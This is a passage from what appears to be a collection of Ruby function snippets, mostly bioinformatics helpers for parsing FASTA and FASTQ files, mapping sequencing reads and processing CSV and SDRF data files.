#{csvs[3]}\",\n \"#{fq1l_sort_command} --buffer-size=#{(options.maximum_memory/2).to_i}%\",\n \"fq1l exclude_degenerate\",\n \"#{fq1l_count_command(options)} #{csvs[4]}\",\n \"fq1l trim_5end --minimum-length=#{options.minimum_length} #{tso_pattern}+\",\n \"#{fq1l_count_command(options)} #{csvs[5]}\",\n \"fq1l restore#{coreutils_prefix_option}\",\n \"pigz -c > #{base}.#{well}.fq.gz\")\n \n unlink_files(tmpfqgzs)\n \n end\n \n end",
"def mappa_e_rimuovi_duplicati(&block)\n self.map.with_index(&block).uniq\n end",
"def candidates2fa(input_file, fasta, read_length, output_file, exoncov=8)\n\t\tchromosomes = {}\n\t\tpositions = []\n\t\t\n\t\t# Input into hash sorted by chromosomes\n\t\tFile.open(input_file, 'r').readlines.each do |line|\n\t\t\tline = line.strip.split(\"\\t\")[0..-2]\n\t\t\tchr_a, pos_a, strand_a, chr_b, pos_b, strand_b = line[0..5]\n\t\t\tpos = [chr_a, pos_a, chr_b, pos_b].join(':')\n\t\n\t\t\tchromosomes[chr_a] = {} if !chromosomes.has_key?(chr_a)\n\t\t\t\n\t\t\tif !chromosomes.has_key?(chr_b)\n\t\t\t\tchromosomes[chr_a][chr_b] = [line]\n\t\t\n\t\t\t# 2nd elsif to exclude reads that map on same junction but opposite ends\t\t\n\t\t\telsif chromosomes[chr_a].has_key?(chr_b) && !positions.include?(pos)\n\t\t\t\tchromosomes[chr_a][chr_b].push(line)\n\t\t\t\tpositions << pos\n\t\t\tend\n\t\tend\n\n\t\t# Output\n\t\toutput = File.open(output_file, 'w') do |output|\n\t\t\tchromosomes.each do |chr_a, values|\n\t\t\t\tfasta_file = File.open(\"#{fasta}#{chr_a}.fa\", 'r')\n\t\t\t\theader = fasta_file.gets.strip\n\t\t\t\tdna_a = fasta_file.read.gsub(/\\n/, '')\n\t\t\t\t\n\t\t\t\tvalues.each do |chr_b, values|\n\t\t\t\t fasta_file = File.open(\"#{fasta}#{chr_b}.fa\", 'r')\n\t\t\t\t\theader = fasta_file.gets.strip\n\t\t\t\t\tdna_b = fasta_file.read.gsub(/\\n/, '')\n\n\t\t\t\t\tvalues.each do |v|\n\t\t\t\t\t\tbp_a, bp_b = v[1].to_i, v[4].to_i\n\t\t\t\t\t\tstrand_a, strand_b = v[2], v[5]\n\t\t\t\t\t\toverlap = v[-1].to_i - read_length\n\t\t\t\t\t\tl = read_length - exoncov \n\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\tupstream = dna_a[bp_a..bp_a + overlap + l].upcase\t\n\t\t\t\t\t\tdownstream = dna_b[bp_b - l - overlap + 1..bp_b - overlap].upcase\n\t\t\t\t\t\n\t\t\t\t\t\tif strand_a == '1' && strand_b == '-1'\n\t\t\t\t\t\t\tdownstream = Alignment.reverse_complement(dna_b[bp_b..bp_b + l].upcase)\n\t\t\t\t\t\telsif strand_a == '-1' && strand_b == '1'\n\t\t\t\t\t\t\tupstream = Alignment.reverse_complement(dna_a[bp_a - l + 1..bp_a].upcase)\n\t\t\t\t\t\tend\n\t\t\n\t\t\t\t\t\tid = [v[0..1], v[3..4]].join(':')\n\t\t\t\t\t\toutput.puts [\">#{id}\", downstream + upstream].join(\"\\n\")\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\t\t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Wrote loci to fasta-file.\"\n\tend",
"def read_last_scans(csv_file_name)\r\n file_identifier_histories = Hash.new(-1)\r\n CSV.foreach(csv_file_name, headers: true) do |row|\r\n file_identifier_histories[row[0]] = row[1]\r\n end\r\n file_identifier_histories\r\n end",
"def write_rmap rmap\n\nend",
"def read_replica_identifiers\n data[:read_replica_identifiers]\n end",
"def read_data stream=STDIN\n\tdata = {}\n\tstream.each do |line|\n\t\tline =~ /^([0-9]*)\\|(.*)/;\n\t\tid, name_addr = $1.to_i, $2\n\t\traise \"duplicate id #{id}?\" if data[id]\n\t\tdata[id] = name_addr\n\tend\n\tdata\nend",
"def gather_rlocs(fh)\n\t\t(0...@nrlocs).each do |rlocnum|\n\t\t\tloc, seg, ref, type, extra = getl(fh).split(' ', 5)\n\t\t\t\n\t\t\t@rlocrecs[rlocnum] = build_rlocrec(loc.hex, seg.hex, ref.hex, type, extra)\n\t\tend\n\tend",
"def read_fasta(fasta_file)\r\n fasta_name = \"\"\r\n fasta_seqs = {}\r\n seq = \"\"\r\n File.open(fasta_file).each do |line|\r\n if !(line.nil?)\r\n if line.start_with? \">\"\r\n seq = \"\"\r\n fasta_name = line.chomp.split(\">\")[1]\r\n elsif\r\n seq = seq + line.chomp\r\n fasta_seqs[fasta_name] = seq\r\n end\r\n end\r\n end\r\n return fasta_seqs\r\nend",
"def read(name)\n mappers[name]\n end",
"def read(name)\n mappers[name]\n end",
"def filter_existing_docs(docs)\n result = []\n docs.each do |d|\n next if !d\n doc_hash = d.inspect.to_md5\n if @docs_read[d[:did]] != doc_hash\n result << d\n @docs_read[d[:did]] = doc_hash\n #else\n #debug \"[filter_existing_docs] document #{d[:did]} already read!\"\n end\n end\n result\n end",
"def index_commands\n File.foreach \"#{$userfile}\" do |line|\n\tline = line.chomp\n\tif !$unique_seq.include?(line)\n\t $unique_seq << line\n\tend\n end\n File.foreach \"#{$userfile}\" do |line|\n\tline = line.chomp\n\t$observation_seq << $unique_seq.index(line)\n end\nend",
"def duplicate_ids\n return [] if accession_number.nil?\n Image.where(accession_number_ssim: @accession_number)\n end",
"def gather_from_csv\n items = {}\n FasterCSV.foreach(@plucked_out_items_csv, FCSV_OPTS){|line|\n STDERR.puts \"ERROR: RMID not found for item_id #{line[:item_id].chomp} in CSV-file #{@plucked_out_items_csv}\" unless line[:rmid]\n items[ line[:item_id].chomp ] = {\n :handle => line[:item_hdl].chomp,\n :rmid => line[:rmid].chomp,\n #:collection_handle => line[:col_owner_hdl].chomp,\n }\n }\n items\n end",
"def match_assembly\n @assembly_map = {}\n lines.each { |lno, assems|\n assems.each { |assem|\n if @assembly_map[assem].nil? then\n @assembly_map[assem] = [lno]\n else \n @assembly_map[assem] << lno\n end\n }\n \n }\n end",
"def map_data_to_uuids\n\t\t@storage.invert\n\tend",
"def hashNQS()\n @hash_nqs={}\n nqsReader=File.open(@nqsFile,\"r\")\n nqsReader.each do |line|\n cols=line.split(/\\s+/)\n \n name=cols[0]\n next if name==\"readName\"\n length=cols[1]\n dist=cols[2]\n qual=cols[3].to_i\n pass=cols[4]\n \n str_result=length+'.'+pass\n str=name+'.'+dist\n if @hash_nqs[str]==nil\n @hash_nqs[str]=str_result\n end\n end\n nqsReader.close\n $stderr.puts @hash_nqs.size\nend",
"def get_original_gene_ids\n # I create a list containing all locus gene and I save the original ids to create the networks\n gene_rows = @arabidopsis_genelist.rows\n gene_rows.each do |row|\n gene = Gene.new(row['Gene_ID'])\n created_gene = gene ? @gene_database.get_gene(gene.gene_id) : false\n if created_gene\n @original_genes.append(created_gene)\n end\n end\n @original_genes\n end",
"def capture_output(mapping)\n ios = mapping.keys\n\n until ios.empty?\n readable_ios, = IO.select(ios, [], [])\n ios_ready_for_eof_check = readable_ios\n\n # We can safely call `eof` without blocking against previously selected\n # IOs.\n ios_ready_for_eof_check.select(&:eof).each do |src|\n # `select`ing an IO which has reached EOF blocks forever.\n # So you have to delete such IO from the array of IOs to `select`.\n ios.delete(src)\n end\n\n break if ios.empty?\n\n readable_ios.each do |io|\n begin\n data = io.read_nonblock(1024)\n mapping.fetch(io).call(data)\n rescue EOFError\n ios.delete(io)\n end\n end\n\n ios_ready_for_eof_check = ios & readable_ios\n end\n end",
"def extract(map)\n # clone map hash, swap keys for string\n map = Hash[map]\n map.keys.each { |k|\n map[k.to_s] = map[k]\n map.delete(k) unless k.is_a?(String)\n }\n\n groups = []\n i = 0\n while(i < length) do\n val = self[i]\n i += 1\n next unless !!map.has_key?(val)\n\n num = map[val]\n group = [val]\n 0.upto(num-1) do |j|\n group << self[i]\n i += 1\n end\n groups << group\n end\n\n groups\n end",
"def uniq(networkcheckoutput)\n mash = Hashie::Mash.new networkcheckoutput\n #networkcheckoutput.hits.hits.each do |value|\n\n #this creates a dataset of unique values based on a specified field. Need to break the Date out of the timestamp field to use.\n seen = Set.new\n mash.hits.hits.inject([]) do |kept, record|\n\n\n #brokenfield = record._source.src_ip.match(/\\w++ [^_]\\w/)\n\n unless seen.include?(record._source.src_ip)\n kept << record\n seen << record._source.src_ip\n end\n kept\n end\n end",
"def process_fna(fna_file)\n fna_hash = Hash.new\n input = File.new(fna_file,'r')\n first_loop = true\n dna_seq = \"\"\n id = \"\"\n count = 0\n while(line = input.gets)\n if(line[0..0] == '>')\n if(first_loop == false)\n fna_hash[id] = dna_seq\n end\n position=line.split(\"|\")\n id = position[3][0..-3]\n dna_seq = \"\"\n first_loop = false\n else\n count = count+1\n dna_seq.concat(line[0..-2])\n end\n end\n fna_hash[id] = dna_seq\n return(fna_hash)\nend",
"def find_unique all_hash\n unique = []\n\n all_hash.each_pair do |full_name, cm|\n unique << cm if full_name == cm.full_name\n end\n\n unique\n end",
"def find_replicates(params)\n unless ( params[:geoid_string].nil? ^ params[:geoid_file].nil?) then\n fr_puts \"Received both a :geoid_string and :geoid_file parameter--exactly one is required! Aborting!\"\n throw :needs_exactly_one_geoid_string_or_file\n end\n @batchmode = ! params[:geoid_file].nil?\n # If running in batch, set up the file to get geoids from\n if @batchmode then\n f = File.new(params[:geoid_file])\n else\n f = [params[:geoid_string]]\n end \n output_basedir = Dir.new(params[:output_dir])\n # This ought to be a constant\n no_db_commits = params[:no_db_commits]\n @calling_command = params[:calling_command]\n\n all_infos = [] # All info hashs discovered \n # Only save list of marshalled infos if in batchmode\n marshal_list = File.new(File.join(output_basedir.path, \"marshal_list.txt\"), \"w\") if @batchmode\n \n # For each line in the file (or the single array entry)\n # figure out what the geoids ought to be and stick them in a hash\n f.each { |line|\n line.chomp!\n (pid, gse, gsms, target_column, sdrf) = line.split(/\\t/)\n gsms = gsms.split(/,/)\n \n info = {} # Hash containing calculated geoid information\n info[:pid] = pid\n\n header = parse_sdrf(sdrf)\n s = header.reverse\n\n fr_puts \"modencode_#{pid} has #{gsms.size.inspect} GSMs\" \n fr_puts \"and we have #{header[0].rows.inspect} rows\"\n\n if gsms.size != header[0].rows then\n raise Exception.new(\"Must supply as many GSMS as rows! SDRF has #{header[0].rows} rows, but received #{gsms.size} GSMS.\")\n end\n\n column_specified = false\n target_column = target_column.to_i\n \n colname = header[target_column].name\n if colname =~ /geo/i then\n fr_puts \"Using existing GEOid column #{colname}\"\n else\n fr_puts \"Using protocol #{header[target_column].split_example}.\"\n column_specified = true\n end\n\n # if it's not geo, use it as protocol:\n if( column_specified ) then \n \n # get previous_protocol (ie target) and the one after it\n previous_protocol = header[target_column]\n previous_protocol_name = previous_protocol.split_example unless previous_protocol.nil?\n next_protocol = header.slice(target_column +1, header.length).find{|col| col.heading =~ /Protocol REF/i}\n next_protocol_name = next_protocol.split_example unless next_protocol.nil?\n\n\n geo_record = SDRFHeader.new(\"Result Value\", \"geo record\") # make a new column\n # populate the geo record\n gsms.each_index{|i|\n geo_record.values[i] = gsms[i]\n }\n fr_puts \" Setting GSMs to: \" + geo_record.values.join(\", \") \n i = next_protocol.nil? ? 
header.size : header.find_index(next_protocol)\n header.insert(i, geo_record)\n fr_puts \" Attach GEO IDs to protocol: '#{previous_protocol.to_s}'\" \n else # there must be a geo colunn\n\n # finding a geo header index.\n geo_header_idx = s.find_index { |h| h.name =~ /geo/i }\n\n if geo_header_idx then\n previous_protocol = s.slice(geo_header_idx, s.length).find { |col| col.heading =~ /Protocol REF/i }; previous_protocol_name = previous_protocol.split_example unless previous_protocol.nil?\n next_protocol = s.slice(0, geo_header_idx).reverse.find { |col| col.heading =~ /Protocol REF/i }; next_protocol_name = next_protocol.split_example unless next_protocol.nil?\n # Attach GEO IDs to existing GEO ID column\n fr_puts \" Found existing GEO ID column for #{pid} between: '#{previous_protocol_name.to_s}' AND '#{next_protocol_name.to_s}'\" \n sdrf_rows = s[geo_header_idx].rows\n geo_header_col = s[geo_header_idx]\n\n if sdrf_rows != gsms.size then\n raise Exception.new(\"Can't match #{sdrf_rows} SDRF rows to #{gsms.size} GEO ids!\")\n \n ## Attach GEO IDs, lining up duplicates with the previous row in the SDRF with the appropriate number of unique values\n #fr_puts \" There are more rows in the SDRF than GSM IDs: #{sdrf_rows} != #{gsms.size}.\" \n # Have to line this up carefully\n #uniq_rows = enough_replicates_at.uniq_rows\n #fr_puts \" Unique rows for #{enough_replicates_at.heading} [#{enough_replicates_at.name}]: \" + uniq_rows.pretty_inspect \n #geo_header_col.values.clear\n #uniq_rows.each_index { |is_idx|\n # uniq_rows[is_idx].each { |i|\n # geo_header_col.values[i] = gsms[is_idx]\n # }\n #}\n #fr_puts \" Setting GSMs to: \" + geo_header_col.values.join(\", \") \n else\n # Attach GEO IDs to the SDRF in order\n geo_header_col.values.clear\n gsms.each_index { |i|\n geo_header_col.values[i] = gsms[i]\n }\n fr_puts \" Setting GSMs to: \" + geo_header_col.values.join(\", \") \n end\n geo_record = geo_header_col\n else # No protocol column and no geo header idx. should never happen.\n raise Exception.new(\"No protocol column or existing GEO column was specified. This should never happen!\")\n end\n end\n\n # If batchmode, make the project's subfolder within out\n output_sdrfdir = @batchmode ? File.join(output_basedir.path, pid.to_s) : output_basedir.path \n FileUtils.mkdir_p(output_sdrfdir)\n out_sdrf = File.join(output_sdrfdir, File.basename(sdrf))\n\n # Create new SDRF, overwriting existing sdrf only if not in batchmode\n print_sdrf(header, out_sdrf, !@batchmode)\n\n info[:geo_header_col] = geo_header_col\n info[:geo_record] = geo_record\n info[:previous_protocol_name] = previous_protocol_name\n\n # stick info in the hash to be remembered\n all_infos << info\n # Write a marshal file\n marshal_filename = GEOID_MARSHAL\n out_marshal = File.join(output_sdrfdir, marshal_filename) \n marshal_file = File.new(out_marshal, \"w\")\n marshal_file.puts(Marshal.dump(info))\n marshal_file.close\n \n marshal_list.puts File.join(pid.to_s, marshal_filename) if @batchmode \n \n } \n \n marshal_list.close if @batchmode\n \n # Then, run the database stuff on all_infos\n attached_geoids = update_db(all_infos, no_db_commits)\n attached_geoids\n end",
"def parse_to_file(line)\n\n z_unique = File.new(@outdir+\"_unique\", 'w')\n z_non_unique = File.new(@outdir+\"_non_unique\", 'w')\n\n while !@filehandler.eof?\n entry1 = make_content(line)\n line = @filehandler.readline()\n entry2 = make_content(line)\n if entry1.q_name == entry2.q_name\n # What if on same chromosome?\n # calling helper procedure\n entries << entry1\n marker2 = true\n while entry1.q_name == entry2.q_name\n\n if entry1.t_name == entry2.t_name\n\n entries << entry2\n\n if @filehandler.eof?\n marker = false\n break\n else\n line = @filehandler.readline()\n entry2 = make_content(line)\n marker = 1\n end\n\n else\n marker2 = false\n\n @counter_non_unique += 1\n\n out = \"#{entry1.to_s()}\"\n z_non_unique.write(out+\"\\n\")\n\n while entry1.qname == entry2.qname\n\n out = \"#{entry2.to_s()}\"\n z_non_unique.write(out+\"\\n\")\n\n if @filehandler.eof?\n marker = false\n break\n else\n line = @filehandler.readline()\n entry2 = make_content(line)\n marker = 1\n end\n end\n\n end\n\n if marker2\n is_in_range?(entries, z_unique, z_non_unique)\n end\n\n\n else\n @counter_unique += 1\n out = \"#{entry1.to_s()}\"\n z_unique.write(out+\"\\n\")\n marker = false\n end\n end\n if marker\n @counter_unique += 1\n out = \"#{entry2.to_s()}\"\n z_unique.write(out+\"\\n\")\n end\n\n puts \"Unique: #{@counter_unique} Non_unique: #{@counter_non_unique}\"\n z_non_unique.close\n z_unique.close\n end",
"def get_references\n references_hash = {}\n FasterCSV.foreach(\"#{Source_path}/TbReference.csv\", :quote_char => '\"', :col_sep =>',', :row_sep =>:auto) do |row|\n references_hash[row[0]] = row[6]\n end\n return references_hash\nend",
"def fastq_to_hash(fastq_file)\n count = 0\n sequence_a = []\n quality_a = []\n count_seq = 0\n\n File.open(fastq_file,'r') do |file|\n file.readlines.collect do |line|\n count +=1\n count_m = count % 4\n if count_m == 1\n line.tr!('@','>')\n sequence_a << line.chomp\n quality_a << line.chomp\n count_seq += 1\n elsif count_m == 2\n sequence_a << line.chomp\n elsif count_m == 0\n quality_a << line.chomp\n end\n end\n end\n sequence_hash = Hash[*sequence_a]\n quality_hash = Hash[*quality_a]\n return_hash = {}\n sequence_hash.each do |k,v|\n return_hash[k] = [v, quality_hash[k]]\n end\n return return_hash\nend",
"def pair_fasta_to_hash(indir)\n files = Dir[indir + \"/*\"]\n r1_file = \"\"\n r2_file = \"\"\n files.each do |f|\n if File.basename(f) =~ /r1/\n r1_file = f\n elsif File.basename(f) =~ /r2/\n r2_file = f\n end\n end\n\n seq1 = fasta_to_hash(r1_file)\n seq2 = fasta_to_hash(r2_file)\n\n new_seq1 = seq1.each_with_object({}) {|(k, v), h| h[k[0..-4]] = v}\n new_seq2 = seq2.each_with_object({}) {|(k, v), h| h[k[0..-4]] = v}\n\n seq_pair_hash = {}\n\n new_seq1.each do |seq_name,seq|\n seq_pair_hash[seq_name] = [seq, new_seq2[seq_name]]\n end\n return seq_pair_hash\nend",
"def fastq_to_fasta(fastq_file)\n count = 0\n sequence_a = []\n count_seq = 0\n\n File.open(fastq_file,'r') do |file|\n file.readlines.collect do |line|\n count +=1\n count_m = count % 4\n if count_m == 1\n line.tr!('@','>')\n sequence_a << line.chomp\n count_seq += 1\n elsif count_m == 2\n sequence_a << line.chomp\n end\n end\n end\n sequence_hash = Hash[*sequence_a]\nend",
"def generate_map\n end",
"def all_readings\n @readings.map do |reading|\n [reading] + reading.role_refs.map{|rr| rr.objectification_join}\n end.flatten.compact\n end",
"def gene_obj_mapping(line, query_name, columns_info)\n return line.start_with?('http://togogenome.org/gene/') unless\n line.force_encoding('UTF-8')\n line = line.encode(\"UTF-16BE\", \"UTF-8\", :invalid => :replace, :undef => :replace, :replace => '?').encode(\"UTF-8\")\n columns = line.split('^@')\n values = {}\n columns_info.each do |column|\n if column[\"is_identify\"]\n gene_no = columns[column[\"column_number\"]].strip.gsub('http://togogenome.org/gene/','')\n values[\"@id\"] = \"http://togogenome.org/gene/#{gene_no}\"\n values[\"gene_id\"] = to_utf(gene_no)\n else # expect id columns are\n value = columns[column[\"column_number\"]].split(\"|||\").map do |entry|\n # irregular case\n if column[\"column_name\"] == 'uniprot_id'\n to_utf(entry.strip.split('/').last)\n elsif query_name == 'protein_cross_references' && column[\"column_name\"] == 'up_xref_ids'\n to_utf(entry.strip.split('/').last)\n elsif query_name == 'protein_sequence_annotation' && column[\"column_name\"] == 'up_seq_anno_feature_ids'\n to_utf(entry.strip.strip.gsub('http://purl.uniprot.org/annotation/',''))\n else\n to_utf(entry.strip)\n end\n end\n values[column[\"column_name\"]] = value\n end\n end\n values\nend",
"def index_commands\n File.foreach \"/home/#{$username}/#{$filename}\" do |line|\n\tline = line.chomp\n\tif !$unique_seq.include?(line)\n\t $unique_seq << line\n\tend\n end\n File.foreach \"/home/#{$username}/#{$filename}\" do |line|\n\tline = line.chomp\n\t$observation_seq << $unique_seq.index(line)\n end\nend",
"def fetchIDs\n\n\tFile.open(ARGV[0].to_s, \"r\") do |file|\n\n\t\t\n\t\tbook = Hash.new\n\n\t\tfile.each_line do |line|\n\n\t\t\tcontainer = Array.new\n\n\t\t\tif line.include? \"Name\"\n\n\t\t\t\tcontainer = line.split(\";\")\n\t\t\t\tcontainer.map { |e| book[\"#{e.gsub!(\"Name=\", \"\")}\"] = line if e.include? \"Name=\" } \n\n\t\t\telse\n\t\t\t\tnext\n\t\t\tend\t\n\t\tend\n\n\t\t#puts book.inspect\n\t\tfile_write(\"Helicoverpa.out\", book)\n\tend\t\t\nend",
"def get_reads(features)\n result = {}\n result[:watson] = features.select { |f| f.strand == '+' }.collect { |e| e.to_read }\n result[:crick] = features.select { |f| f.strand == '-' }.collect { |e| e.to_read }\n return result\n end",
"def last_scans(options = {})\r\n nexpose_ids= Hash.new(-1)\r\n trimmed_csv = load_last_scans(options)\r\n trimmed_csv.drop(1).each do |row|\r\n nexpose_ids[row[0]] = row[1]\r\n end\r\n nexpose_ids\r\n end",
"def get_unique_keys_hash\n columns = unique_key_columns << :id\n Hash[select(columns).load.map { |r| [r.unique_key, r.id] }]\n end",
"def split_refseq\n # prepare output files\n system(%Q[cut -f4 #{$prepare_dir}/refseq_genes_result.tsv | cut -c1-5 | sort | uniq > #{$prepare_dir}/refp_prefix_list.txt ]) # get exist prefix list of protein_id\n FileUtils.mkdir_p(\"#{$prepare_dir}/refp\") unless File.exist?(\"#{$prepare_dir}/refp\")\n refp_output = {}\n File.open(\"#{$prepare_dir}/refp_prefix_list.txt\") do |f|\n f.each_line do |line|\n prefix = line.chomp.strip\n refp_output[prefix] = File.open(\"#{$prepare_dir}/refp/#{prefix}.dat\", \"w\")\n end\n end\n refp_output[\"no_protein_id\"] = File.open(\"#{$prepare_dir}/refp/no_protein_id.dat\", \"w\") # protein_id is optional\n\n File.open(\"#{$prepare_dir}/refseq_genes_result.tsv\") do |f|\n f.each_line do |line|\n columns = line.chomp.strip.split(\"\\t\")\n prefix = (columns[3].nil? || columns[3] == \"\") ? \"no_protein_id\" : columns[3][0..4] # protein_id is optional\n refp_output[prefix].puts line.chomp.strip\n end\n end\n refp_output.each do |k, v|\n v.flush\n v.close\n end\nend",
"def get_mapping(cid)\n dir = ASF::SVN['ldap-map']\n filename = File.join(dir, MAPPING_FILE).untaint\n maps = JSON.parse(File.read(filename))\n if maps.has_key?(cid)\n return maps[cid]\n else\n return { COMMITTERID => cid }\n end\nend",
"def reader_ids\n group_user_ids(readers_join_table)\n end",
"def km_reduce_reacid(acc, crt)\n return acc if crt[\"reaction\"].nil?\n k = crt[\"entry\"][0].match(/^(?<id>M\\d{5})/)[:id]\n r = km_get_reacid(crt[\"reaction\"])\n return acc if r.empty?\n acc[k] = r\n return acc\nend",
"def target_id; genomic.entry_id; end",
"def annotate\n genes={}\n File.open(ANNOTATION,'r').each do |line|\n temp=line.split\n genes[temp[9]]={}\n genes[temp[9]][\"start\"]=temp[3].to_i\n genes[temp[9]][\"end\"]=temp[4].to_i\n genes[temp[9]][\"strand\"]=temp[6]\n genes[temp[9]][\"length\"]=temp[4].to_i - 1 - temp[3].to_i\n end\n return genes\nend",
"def read(entry); end",
"def fasta_to_hash(infile)\n f=File.open(infile,\"r\")\n return_hash = {}\n name = \"\"\n while line = f.gets do\n if line =~ /^\\>/\n name = line.chomp\n return_hash[name] = \"\"\n else\n return_hash[name] += line.chomp\n end\n end\n f.close\n return return_hash\nend",
"def fasta_to_hash(infile)\n f=File.open(infile,\"r\")\n return_hash = {}\n name = \"\"\n while line = f.gets do\n if line =~ /^\\>/\n name = line.chomp\n return_hash[name] = \"\"\n else\n return_hash[name] += line.chomp\n end\n end\n f.close\n return return_hash\nend",
"def readRaw\n puts \"Reading raw data..\"\n # data = {uid => {iid => [hour1, hour2, ...]}}}\n data = {}\n while line = $stdin.gets do\n uid, iid, hour = line.chomp.split(',').map {|e| e.to_i}\n data[uid] = {} unless data.key?(uid)\n data[uid][iid] = [] unless data[uid].key?(iid)\n data[uid][iid] += [hour]\n end\n data.each_pair do |u, ihs|\n ihs.each_key {|i| ihs[i].uniq.sort}\n end\n return data\nend",
"def underbang_reader(key); end",
"def final_candidates(before, after, output_file)\n\t\tcandidates = {}\n\t\tall_ids = {}\n\n\t\t# Read circular candidates into hash\n\t\tFile.open(before, 'r').readlines.each do |line|\n\t\t\tline = line.strip.split(\"\\t\")\n\t\n\t\t\tpos = [line[0..1], line[3..4]].join(':')\n\t\t\tread_count = line[6].to_i\n\t\t\tqname = line[-1].split(';')\n\t\n\t\t\t# Create qname index to make search faster\n\t\t\t# Remark 2\n\t\t\tqname.each do |q|\n\t\t\t\tk1, k2 = q.split(':')[3..4]\n\t\t\n\t\t\t\tall_ids[k1] = {} if !all_ids.has_key?(k1)\n\t\t\n\t\t\t\tif !all_ids[k1].has_key?(k2)\n\t\t\t\t\tall_ids[k1][k2] = [q]\n\t\t\t\telse\n\t\t\t\t\tall_ids[k1][k2] << q\n\t\t\t\tend\n\t\t\tend\n\n\t\t\tcandidates[pos] = {:counts => read_count, :qnames => qname}\n\t\tend\n\n\t\t# Read remapped readpairs and compare them to initial candidates\n\t\tFile.open(after, 'r').readlines.each do |line|\n\t\t\tline = line.strip.split(\"\\t\")\n\t\n\t\t\tqname = line[0]\n\t\t\tpos = [line[1..2], line[3..4]].join(':')\n\t\t\tk1, k2 = qname.split(':')[3..4]\n\n\t\t\tread_unused = (!all_ids.has_key?(k1) || !all_ids[k1].has_key?(k2) || !all_ids[k1][k2].include?(qname)) \n\t\t\t\t\t\t\n\t\t\t# Add read if read is not already used (condition 2)\n\t\t\tif candidates.has_key?(pos) && read_unused \n\t\t\t\tcandidates[pos][:counts] += 1\n\t\t\t\tcandidates[pos][:qnames] << qname\n\t\t\tend\n\t\tend\n\n\t\t# Output\n\t\tFile.open(output_file, 'w') do |output|\n\t\t\toutput.puts %w(chr pos_a chr_b pos_b readCounts qnames).join(\"\\t\")\n\t\n\t\t\tcandidates.each do |pos, v| \n\t\t\t\toutput.puts [pos.split(':'), v[:counts], v[:qnames].join(';')].join(\"\\t\")\n\t\t\tend\n\t\tend\n\t\t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Final candidate list finished.\"\n\tend",
"def merge_read_to_run(runid, reads)\n if reads.size == 1\n (reads[0].drop(1).insert(0, runid) << \"SINGLE\").join(\"\\t\")\n else\n pairs = remove_nonpair(reads)\n if pairs.size == 2\n merge_paired_reads(pairs).join(\"\\t\")\n else\n \"PAIR CORRUPTED: #{runid}\"\n end\n end\n end",
"def each_unread read\n @rmutex.read_sync do\n @readable.each do |m|\n unless read.include? m.id\n yield m\n end\n end\n end\n end",
"def process_mapline(line,zoneid,node_id, map)\n offset = 0\n length = 6\n lineLength = line.length\n map[zoneid] = Hash.new\n count = 0\n while offset < lineLength\n x = \"#{line[offset,2]}.#{line[offset+2,1]}\"\n y = \"#{line[offset+3,2]}.#{line[offset+5,1]}\"\n offset = offset + 6\n map[zoneid][gather_coords(x.to_f,y.to_f)] = node_id\n count +=1\n end\n return count\nend",
"def process_map_interface\n\n # Initialize vars\n h_ints_map_out = Hash.new\n\n # open the file with list of interfaces to process, and zone to map each to\n intsfile = File.open($opts[:interfacemapout], 'r')\n\n intsfile.each_line do |x|\n key, val = x.split\n h_ints_map_out[key] = val\n end\n\n intsfile.close\n return h_ints_map_out\nend",
"def mapsUnique?()\n return false unless passed_filter?\n return false if unmapped_Ns? || unmapped?\n if @chrom =~ /^\\d+:\\d+:\\d+$/\n false\n else\n true\n end\n end",
"def get_crosswalk_record_having_mapping_code_factor(crosswalk_records)\n rcc_log.debug \"Obtains the crosswalk record based on the mapping code factor : #{mapping_code_factor}\"\n crosswalk_record_having_mapping_code_factor = nil\n if crosswalk_records.present?\n crosswalk_records.each do |crosswalk_record|\n if crosswalk_record.present?\n if mapping_code_factor == 'HIPAA CODE'\n crosswalked_code = hipaa_code_related_to_partner_and_payment_condition(crosswalk_record)\n elsif @is_partner_bac && mapping_code_factor == 'CLIENT CODE'\n crosswalked_code = client_code_related_to_partner_and_payment_condition(crosswalk_record)\n end\n if crosswalked_code.present?\n crosswalk_record_having_mapping_code_factor = crosswalk_record\n break\n end\n end\n end\n end\n rcc_log.debug \"The chosen crosswalked record having the mapping_code_factor, \\\n #{mapping_code_factor} is #{crosswalk_record_having_mapping_code_factor.id if crosswalk_record_having_mapping_code_factor.present?}\"\n crosswalk_record_having_mapping_code_factor\n end",
"def si_map\n @si_map.values\n end",
"def reads\n (1..read_count).to_a\n end",
"def uniq_sequence(seq = {}, sequence_name = \"sequence\")\n uni = count(seq.values)\n new_seq = {}\n n = 1\n uni.each do |s,c|\n name = \">\" + sequence_name + \"_\" + n.to_s + \"_\" + c.to_s\n new_seq[name] = s\n n += 1\n end\n return new_seq\nend",
"def get_default_data_processing_ids(io, index_list, lookback=300)\n hash = {}\n index_list.each_pair do |name, index|\n if index.size > 0\n # ^ we cannot quickly retrieve a defaultDataProcessingRef unless there\n # is at least one spectrum/chromatogram to start with. However, if\n # there is no spectrum/chromatogram, then the defaultDataProcessingRef\n # will not be needed either.\n io.bookmark do |io|\n io.pos = index[0] - lookback \n hash[name] = io.read(lookback)[/<#{name}List.*defaultDataProcessingRef=['\"](.*?)['\"]/m, 1]\n end\n end\n end\n hash\n end",
"def genome_map\n @genome_map ||= %w(A B C D E F G H I J K L M N O P Q R S T U V W X Y Z)\n end",
"def get_common_lines\n file2 = @file2.dup\n common_lines = {}\n\n acc = 0\n @file1.each_with_index { |str, i|\n line = file2.index(str)\n unless line.nil?\n common_lines[i] = acc + line\n acc += line + 1\n file2 = file2.drop(line + 1)\n end\n }\n\n common_lines\n end",
"def process_externals_hash\n File.open(\"./lib/externals/externals_table_data_input_hash.txt\", \"r\") do |f|\n f.each_line do |line|\n external_searched, searched = line.chomp.split(\"\\t\")\n # created_sequence_id = external_searched(/continue code/)\n # creation_sequence_id = \n # complete_sequence_id = \n # lexigram_sequence_id = \n # singular_sequence_id = complete_sequence_id.squeeze\n puts \"#{external_searched.to_textual}\\t#{searched}\" \n sleep(0.01)\n end\n end\n end",
"def fetch_unaligned_sequences \n answer = Array.new \n self.genomic_aligns.each do |piece| \n sequence = piece.get_slice.seq\n fas = Bio::FastaFormat.new(Bio::Sequence::NA.new(sequence).to_fasta(piece.genomic_align_id))\n answer.push(fas) \n end \n return answer \n end",
